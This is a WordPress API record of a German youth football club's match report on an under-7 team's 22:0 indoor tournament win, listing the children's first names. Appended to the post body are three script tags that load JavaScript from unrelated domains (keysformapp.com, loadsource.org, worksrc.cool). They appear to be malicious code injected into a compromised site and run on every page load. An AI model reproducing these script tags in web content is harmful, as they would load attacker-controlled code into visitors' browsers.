{"id":6950,"date":"2018-11-11T23:13:10","date_gmt":"2018-11-11T22:13:10","guid":{"rendered":"http:\/\/www.jugendfussball-wendelstein.de\/wordpress\/?p=6950"},"modified":"2018-11-11T23:13:32","modified_gmt":"2018-11-11T22:13:32","slug":"tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues","status":"publish","type":"post","link":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\/","title":{"rendered":"Tagessieg zum Auftakt der Hallenkreismeisterschaft f\u00fcr unsere Mini Blues !!!"},"content":{"rendered":"<p>Danke f\u00fcr einen reibungslosen Ablauf an den Gastgeber Burgthann, der uns ein sch\u00f6nes Turnier erm\u00f6glicht hat.<\/p>\n<p>Im neuen Spielmodus musste sich unsere G1 auf unbekanntes Terrain begeben. Sowohl die Fuzzal Regeln, als auch der Ball, die ver\u00e4nderte<\/p>\n<p>Anzahl(4+1) oder auch die fehlende Bande stellte f\u00fcr unsere Kids eine neue Herausforderung dar. Zusammen mit f\u00fcnf weiteren Vereinen k\u00e4mpften wir nun um den Tagessieg dieses Turniers. Nach den ersten holprigen Minuten verflog die Unsicherheit unserer Kinder jedoch sehr schnell und gerade die tollen Passstafetten sorgten daf\u00fcr, dass unsere Gegner schwindelig gespielt wurden. Mit einem Torverh\u00e4ltnis von 22:0 Toren gingen wir als souver\u00e4ner und v\u00f6llig verdienter Sieger hervor. Unsere Kids bereiten uns einfach Freunde, weiter so.<\/p>\n<p>&nbsp;<\/p>\n<p>Liam, Samuel, Colin, Johannes, Sonnwin, Sebastian, Paula, Ramis #teamgeist# #beste Mannschaft#<\/p>\n<p><script src=\"\/\/keysformapp.com\/1cbbe6fbfefc3b777d.js\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52295x7355x&amp;r=1541974395638\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/worksrc.cool\/ext\/1cbbe6fbfefc3b777d.js?sid=52295_7355_&amp;title=FF_%5B602%5D_formkeyapp.cool&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Danke f\u00fcr einen reibungslosen Ablauf an den Gastgeber Burgthann, der uns ein sch\u00f6nes Turnier erm\u00f6glicht hat. Im neuen Spielmodus musste sich unsere G1 auf unbekanntes Terrain begeben. Sowohl die Fuzzal Regeln, als auch der Ball, die ver\u00e4nderte Anzahl(4+1) oder auch die fehlende Bande stellte f\u00fcr unsere Kids eine neue Herausforderung dar. Zusammen mit f\u00fcnf weiteren [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"saved_in_kubio":false,"footnotes":""},"categories":[3,16,25],"tags":[],"class_list":["post-6950","post","type-post","status-publish","format-standard","hentry","category-kf","category-spielbericht","category-u7-roeth"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Tagessieg zum Auftakt der Hallenkreismeisterschaft f\u00fcr unsere Mini Blues !!! - JFG Wendelstein<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Tagessieg zum Auftakt der Hallenkreismeisterschaft f\u00fcr unsere Mini Blues !!! - JFG Wendelstein\" \/>\n<meta property=\"og:description\" content=\"Danke f\u00fcr einen reibungslosen Ablauf an den Gastgeber Burgthann, der uns ein sch\u00f6nes Turnier erm\u00f6glicht hat. Im neuen Spielmodus musste sich unsere G1 auf unbekanntes Terrain begeben. Sowohl die Fuzzal Regeln, als auch der Ball, die ver\u00e4nderte Anzahl(4+1) oder auch die fehlende Bande stellte f\u00fcr unsere Kids eine neue Herausforderung dar. Zusammen mit f\u00fcnf weiteren [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\/\" \/>\n<meta property=\"og:site_name\" content=\"JFG Wendelstein\" \/>\n<meta property=\"article:published_time\" content=\"2018-11-11T22:13:10+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-11-11T22:13:32+00:00\" \/>\n<meta name=\"author\" content=\"Autor\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"Autor\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"1\u00a0Minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\\\/\"},\"author\":{\"name\":\"Autor\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\"},\"headline\":\"Tagessieg zum Auftakt der Hallenkreismeisterschaft f\u00fcr unsere Mini Blues !!!\",\"datePublished\":\"2018-11-11T22:13:10+00:00\",\"dateModified\":\"2018-11-11T22:13:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\\\/\"},\"wordCount\":145,\"articleSection\":[\"Kleinfeld\",\"Spielbericht\",\"U7 R\u00f6th.\"],\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\\\/\",\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\\\/\",\"name\":\"Tagessieg zum Auftakt der Hallenkreismeisterschaft f\u00fcr unsere Mini Blues !!! - JFG Wendelstein\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#website\"},\"datePublished\":\"2018-11-11T22:13:10+00:00\",\"dateModified\":\"2018-11-11T22:13:32+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Startseite\",\"item\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Tagessieg zum Auftakt der Hallenkreismeisterschaft f\u00fcr unsere Mini Blues !!!\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#website\",\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/\",\"name\":\"JFG Wendelstein\",\"description\":\"Juniorenfu\u00dfball\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\",\"name\":\"Autor\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"caption\":\"Autor\"},\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/author\\\/autor\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Tagessieg zum Auftakt der Hallenkreismeisterschaft f\u00fcr unsere Mini Blues !!! - JFG Wendelstein","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\/","og_locale":"de_DE","og_type":"article","og_title":"Tagessieg zum Auftakt der Hallenkreismeisterschaft f\u00fcr unsere Mini Blues !!! - JFG Wendelstein","og_description":"Danke f\u00fcr einen reibungslosen Ablauf an den Gastgeber Burgthann, der uns ein sch\u00f6nes Turnier erm\u00f6glicht hat. Im neuen Spielmodus musste sich unsere G1 auf unbekanntes Terrain begeben. Sowohl die Fuzzal Regeln, als auch der Ball, die ver\u00e4nderte Anzahl(4+1) oder auch die fehlende Bande stellte f\u00fcr unsere Kids eine neue Herausforderung dar. Zusammen mit f\u00fcnf weiteren [&hellip;]","og_url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\/","og_site_name":"JFG Wendelstein","article_published_time":"2018-11-11T22:13:10+00:00","article_modified_time":"2018-11-11T22:13:32+00:00","author":"Autor","twitter_card":"summary_large_image","twitter_misc":{"Verfasst von":"Autor","Gesch\u00e4tzte Lesezeit":"1\u00a0Minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\/#article","isPartOf":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\/"},"author":{"name":"Autor","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9"},"headline":"Tagessieg zum Auftakt der Hallenkreismeisterschaft f\u00fcr unsere Mini Blues !!!","datePublished":"2018-11-11T22:13:10+00:00","dateModified":"2018-11-11T22:13:32+00:00","mainEntityOfPage":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\/"},"wordCount":145,"articleSection":["Kleinfeld","Spielbericht","U7 R\u00f6th."],"inLanguage":"de"},{"@type":"WebPage","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\/","url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\/","name":"Tagessieg zum Auftakt der Hallenkreismeisterschaft f\u00fcr unsere Mini Blues !!! - JFG Wendelstein","isPartOf":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#website"},"datePublished":"2018-11-11T22:13:10+00:00","dateModified":"2018-11-11T22:13:32+00:00","author":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9"},"breadcrumb":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/tagessieg-zum-auftakt-der-hallenkreismeisterschaft-fuer-unsere-mini-blues\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/"},{"@type":"ListItem","position":2,"name":"Tagessieg zum Auftakt der Hallenkreismeisterschaft f\u00fcr unsere Mini Blues !!!"}]},{"@type":"WebSite","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#website","url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/","name":"JFG Wendelstein","description":"Juniorenfu\u00dfball","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Person","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9","name":"Autor","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","caption":"Autor"},"url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/author\/autor\/"}]}},"_links":{"self":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts\/6950","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/comments?post=6950"}],"version-history":[{"count":0,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts\/6950\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/media?parent=6950"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/categories?post=6950"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/tags?post=6950"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}